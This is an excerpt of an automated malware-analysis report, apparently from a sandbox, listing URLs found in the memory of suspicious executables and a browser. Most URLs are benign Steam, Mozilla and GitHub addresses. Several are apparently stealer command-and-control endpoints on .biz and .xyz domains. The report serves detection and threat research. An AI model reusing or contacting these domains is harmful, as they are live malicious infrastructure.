Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000020.00000003.3323492995.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3331519614.000001D76C464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3320833254.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2724138730.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/
Source: c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/Cz
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apic
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apif
Source: c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apiyc
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://debonairnukk.xyz/api
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://debonairnukk.xyz/api/p8
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://debonairnukk.xyz/api8
Source: H9TU4oY.exe, 00000007.00000002.2626548751.000000000166C000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.000000000166B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://debonairnukk.xyz/apif
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/api
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/api.0
Source: H9TU4oY.exe, 00000007.00000002.2626548751.000000000166C000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.000000000166B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/apif
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz:443/api
Source: firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000020.00000003.3245468426.000001D764B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001652000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2861700918.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/
Source: c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/3z
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/4:
Source: c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api:
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api;?an
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/apiK
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/apic)
Source: H9TU4oY.exe, 00000007.00000002.2626548751.000000000166C000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.000000000166B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001669000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542498583.0000000001669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/apif
Source: c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/i
Source: c1ca3b12e5.exe, 0000000F.00000003.2861700918.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/x
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2861700918.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz:443/api
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000020.00000003.3008197656.000001D764F5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000020.00000003.3008197656.000001D764F5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000020.00000003.3351738251.000001D76C396000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3351738251.000001D76C3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3232977584.000001D766718000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000020.00000003.2989724093.000001D76F760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000020.00000003.2836334530.000001D762B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2836706840.000001D762B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 00000020.00000003.3331519614.000001D76C464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3320657883.000001D76C4FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/apps/oldsyncS
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/cmd/H
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/cmd/HCX
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryU
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://identity.mozilla.com/ids/ecosystem_telemetryUFj
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542498583.0000000001669000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/t.
